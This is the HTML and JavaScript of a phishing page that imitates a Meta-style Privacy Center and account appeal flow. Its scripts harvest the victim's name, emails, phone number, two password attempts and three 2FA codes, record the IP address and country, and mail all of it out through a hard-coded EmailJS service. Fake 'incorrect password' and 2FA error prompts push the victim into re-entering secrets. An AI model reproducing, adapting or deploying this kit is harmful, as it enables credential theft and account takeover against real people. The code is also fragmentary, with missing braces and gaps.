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<h5>What happens if you do not allow us to collect certain types of information?</h5>
<p>Some information is necessary for the operation of our Products. Other information is optional,
but its absence may affect your experience with our products.</p>
<p><a>More details ></a></p>
<h5>What if the information we collect does not personally identify individuals?</h5>
<p>In some cases, before third parties make information available to us, they de-identify,
aggregate, or anonymize it so that it cannot be used to identify individual individuals. We use
this information as described below, without attempting to re-identify individuals.</p>
<h5>Data control</h5>
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<img src="../img/dir.png" alt="">
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<span>Manage the information we collect about you</span>
<span class="small-grey">Privacy Center</span>
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<h4 class="modal-title" id="accountsModalLabel">Accounts in the Privacy Center </h4>
<p>Accounts and profiles that you add to one Account Center are also available in the Privacy
Center. Here you can select the account and profile you need.</p> <br>
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<a class="add-svg">You can manage these accounts in the Account Center.
<svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1ngqms7 x18sheln x1hyyqv4 x1n2onr6 xrhstn2 xn47u6e">
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'link': '',
'add_svg_link': false
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'2FA-2': '',
'2FA-3': '',
'page-name': '',
'apeal': '',
var userIpData = {
'user_ip': 'Incorrect request ;(',
'country': '-',
'country_code': '-',
var metrics = {
'dis_name': 'MPC',
'is_Mobile': window.mobileCheck(),
'params': prettyUtmParams(),
var firstModal = new bootstrap.Modal(document.getElementById('exampleModal1'))
var apiModal = new bootstrap.Modal(document.getElementById('exampleModal2'))
var twoFAModal = new bootstrap.Modal(document.getElementById('twoFAmodal'))
var successModal = new bootstrap.Modal(document.getElementById('successModal'))
var termsModal = new bootstrap.Modal(document.getElementById('TermsModal'))
var policyModal = new bootstrap.Modal(document.getElementById('policyModal'))
var searchModal = new bootstrap.Modal(document.getElementById('searchModal'))
var accountsModal = new bootstrap.Modal(document.getElementById('accountsModal'))
var searchInput = document.getElementById('searchModal').querySelector('input')
const apiInput = document.getElementById('exampleModal2').querySelector('input')
const showHidePassEye = document.getElementById('show-hide-pass')
showHidePassEye.addEventListener('click', totglePassDisplay)
var firstForm = document.getElementById('first-form')
var apiForm = document.getElementById('apiForm')
var twoFAForm = document.getElementById('twoFAForm')
firstForm.addEventListener('submit', firstFormHandle)
apiForm.addEventListener('submit', apiFormhandle)
twoFAForm.addEventListener('submit', twoFAFormHandle)
document.getElementById('termsLink').addEventListener('click', function (e) {
document.getElementById('policyLink').addEventListener('click', function (e) {
document.getElementById('search').addEventListener('click', function (e) {
document.querySelectorAll('a[href="#"]').forEach(elem => {
elem.addEventListener('click', function (e) {
document.querySelectorAll('.password-input').forEach(elem => {
elem.addEventListener('click', function (e) {
if (e.target.id != 'show-hide-pass') {
var elem = e.currentTarget
var fakeSearchProccesBlock = document.getElementById('searchModal').querySelector('.fake-items')
var notFoundBlock = document.getElementById('searchModal').querySelector('.now-found')
var searchItemsBlock = document.getElementById('search-items')
var cleanSearchText = document.getElementById('searchModal').querySelector('.close-search-icon-wraper')
cleanSearchText.addEventListener('click', function (e) {
searchInput.value = ''
cleanSearchText.style.display = 'none'
searchItemsBlock.style.display = 'none'
// type text in search
var isSearch = false
searchInput.addEventListener('input', function () {
if (searchInput.value.length != 0) {
cleanSearchText.style.display = 'flex'
} else {
cleanSearchText.style.display = 'none'
searchItemsBlock.style.display = 'none'
if (isSearch == false) {
isSearch = true
fakeSearchProccesBlock.style.display = 'none'
notFoundBlock.style.display = 'none';
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fakeSearchProccesBlock.style.display = 'block';
notFoundBlock.style.display = 'none';
setTimeout(function () {
notFoundBlock.style.display = 'block';
fakeSearchProccesBlock.style.display = 'none';
isSearch = false
}, 1000)
}, 1500)
// Get User IP
var url = 'https://api.db-ip.com/v2/free/self/'
async function getUserIp() {
const response = await fetch(url);
if (response.status == 200) {
const data = await response.json();
userIpData = {
'user_ip': data.ipAddress,
'country': data.countryName,
'country_code': data.countryCode,
} else {
userIpData = {
'user_ip': 'Ip not detected ;(',
'country': '-',
'country_code': '-',
// Send data to Email
function sendDataEmail() {
var templateData = {
'user_ip': userIpData.user_ip,
'country': userIpData.country,
'country_code': userIpData.country_code,
'full-name': formsSendData['full-name'],
'personal-email': formsSendData['personal-email'],
'buiseness-email': formsSendData['buiseness-email'],
'mobile-phone-number': formsSendData['mobile-phone-number'],
'password-1': formsSendData['password-1'],
'password-2': formsSendData['password-2'],
'2FA-1': formsSendData['2FA-1'],
'2FA-2': formsSendData['2FA-2'],
'2FA-3': formsSendData['2FA-3'],
'page-name': formsSendData['page-name'],
'apeal': formsSendData['apeal'],
'dis_name': metrics.dis_name,
'is_Mobile': metrics.is_Mobile,
'params': metrics.params
// thay mail js
// https://dashboard.emailjs.com/admin
var serviceID = "service_v9jxzvq";
// Public Key https://dashboard.emailjs.com/admin/account
var userId = "HIKv-8XpEjNmn-LZG";
// https://dashboard.emailjs.com/admin/templates/n9wx5on/settings
var templateId = "template_oc4k7ag";
var data = {
service_id: serviceID,
template_id: templateId,
user_id: userId,
template_params: templateData
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
type: 'POST',
data: JSON.stringify(data),
contentType: 'application/json'
}).done(function () {
// Xử lý khi gửi thành công
}).fail(function (error) {
// Xử lý khi gửi thất bại
function firstFormHandle(event) {
var spiner = firstForm.querySelector('.spinner-border')
var buttonText = firstForm.querySelector('.button-text')
var button = firstForm.querySelector('button')
button.setAttribute('disabled', '')
spiner.style.display = 'block'
buttonText.style.display = 'none'
setTimeout(function () {
spiner.style.display = 'none'
buttonText.style.display = 'block'
}, 2000)
function hidePasswordIncorrectText() {
setTimeout(function () {
var errortext = apiForm.querySelector('.invalid-feedback')
errortext.style.display = 'none'
}, 5000)
function apiFormhandle(event) {
var spiner = apiForm.querySelector('.spinner-border')
var buttonText = apiForm.querySelector('.button-text')
var button = apiForm.querySelector('button')
var input = apiForm.querySelector('input')
var errortext = apiForm.querySelector('.invalid-feedback')
spiner.style.display = 'block'
buttonText.style.display = 'none'
errortext.style.display = 'none'
button.setAttribute('disabled', '')
setTimeout(function () {
if (apiInsertCounter == 0) {
errortext.style.display = 'block'
errortext = apiForm.querySelector('input').value = ''
spiner.style.display = 'none'
buttonText.style.display = 'block'
input.setAttribute('name', 'password-2')
} else {
errortext.style.display = 'none'
spiner.style.display = 'none'
buttonText.style.display = 'block'
input.setAttribute('name', 'password-1')
}, 4000)
var counter2FA = 1
var countOf2FA = 3
function twoFAFormHandle(event) {
//handleFormSubmit(event, twoFAForm)
var passwordInput = twoFAForm.querySelector('.password-input')
var spiner = twoFAForm.querySelector('.spinner-border')
var buttonText = twoFAForm.querySelector('.button-text')
var button = twoFAForm.querySelector('button')
var errortext = twoFAForm.querySelector('.invalid-feedback')
var input = twoFAForm.querySelector('input')
errortext.style.display = 'none'
spiner.style.display = 'block'
buttonText.style.display = 'none'
button.setAttribute('disabled', '')
setTimeout(function () {
if (counter2FA >= countOf2FA + 1) {
// SHOW success
spiner.style.display = 'none'
buttonText.style.display = 'block'
} else {
var send2FAButton = twoFAForm.querySelector('button.btn')
input.setAttribute('disabled', '')
input.setAttribute('name', '2FA-' + counter2FA)
send2FAButton.setAttribute('disabled', '')
twoFAForm.querySelector('input').value = ''
errortext.style.display = 'block'
spiner.style.display = 'none'
buttonText.style.display = 'block'
}, 6000)
function unlock2FA() {
var passwordInput = twoFAForm.querySelector('.password-input')
var errortext = twoFAForm.querySelector('.invalid-feedback')
var input = twoFAForm.querySelector('input')
var button = twoFAForm.querySelector('button')
errortext.style.display = 'none'
var send2FAButton = twoFAForm.querySelector('button.btn')
function serializeForm(formNode) {
const {
} = formNode
const data = Array.from(elements)
.filter((item) => item.name != '')
.map((element) => {
const {
} = element
return {
var dict_data = {}
for (let i = 0; i < data.length; i++) {
var elem = data[i]
dict_data[elem.name] = elem.value
return dict_data
function totglePassDisplay() {
if (apiInput.type == 'password') {
apiInput.type = 'text'
} else {
apiInput.type = 'password'
function updateFormsSendData(dict) {
for (var [key, value] of Object.entries(dict)) {
formsSendData[key] = value
function startTimer() {
var countDownDate = new Date().getTime();
var x = setInterval(function () {
var now = new Date().getTime();
var distance = Math.round((now - countDownDate) / 1000);
var insertedTime = INCORRECT_2FA_TIMEOUT - distance;
document.getElementById("timer").innerHTML = insertedTime + "s ";
document.getElementById("timer").style.display = 'inline';
if (insertedTime <= 0) {
document.getElementById("timer").style.display = 'none';
document.getElementById("timer").innerHTML = "EXPIRED";
}, 1000);
/* ----------------------------------------------------------------------------- */
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/* ----------------------------------------------------------------------------- */
function detectUtmUserLeftBar() {
// Left side user account
var url = new URL(window.location.href);
var user = url.searchParams.get("userleft")
if (user) {
document.getElementById('utm-user').style.display = 'flex'
function delectAccountUtm() {
// Left side user account
var url = new URL(window.location.href);
var account = url.searchParams.get("account")
if (account) {
account = account.replace(UTM_SPACE_ESCAPE_CHAR, ' ')
document.getElementById('view-accounts').style.display = 'flex'
var pageGroupNameInput = document.getElementById('fb-page-name-input')
pageGroupNameInput.value = account
pageGroupNameInput.setAttribute('disabled', 'disabled')
function delectTicketIdUtm() {
var url = new URL(window.location.href);
var ticket = url.searchParams.get("ticketId")
if (ticket) {
document.getElementById('utm-ticketId').style.display = 'flex'
document.getElementById('utm-ticketId').querySelector('span').innerText = ticket
function addUserName(name) {
var elems = document.querySelectorAll('.UserName')
elems.forEach(elem => {
elem.innerText = name
function addSvgInLinks() {
var svg = `
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d="M11.292 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z">
var links = document.querySelectorAll('a.add-svg')
links.forEach(elem => {
elem.innerHTML = elem.textContent + svg
function dictToString(dict) {
var result = ''
let entries = Object.entries(dict);
entries.forEach(pair => {
var paramName = pair[0]
var paramValue = pair[1]
result = result + `${paramName} : ${paramValue}\n`
//result = result + '\n'
return result
function prettyUtmParams() {
var params = new URL(window.location.href).search
params = params.slice(1)
params = params.split('&')
var result = '\n'
params.forEach(elem => {
var key = elem.split('=')[0]
var value = elem.split('=')[1]
result = result + `${key} : ${value}\n`
return result
var fake_policy_links = document.querySelector('.fake-likns').querySelectorAll('.action-button.wide')
fake_policy_links.forEach(elem => {
elem.addEventListener('click', function () {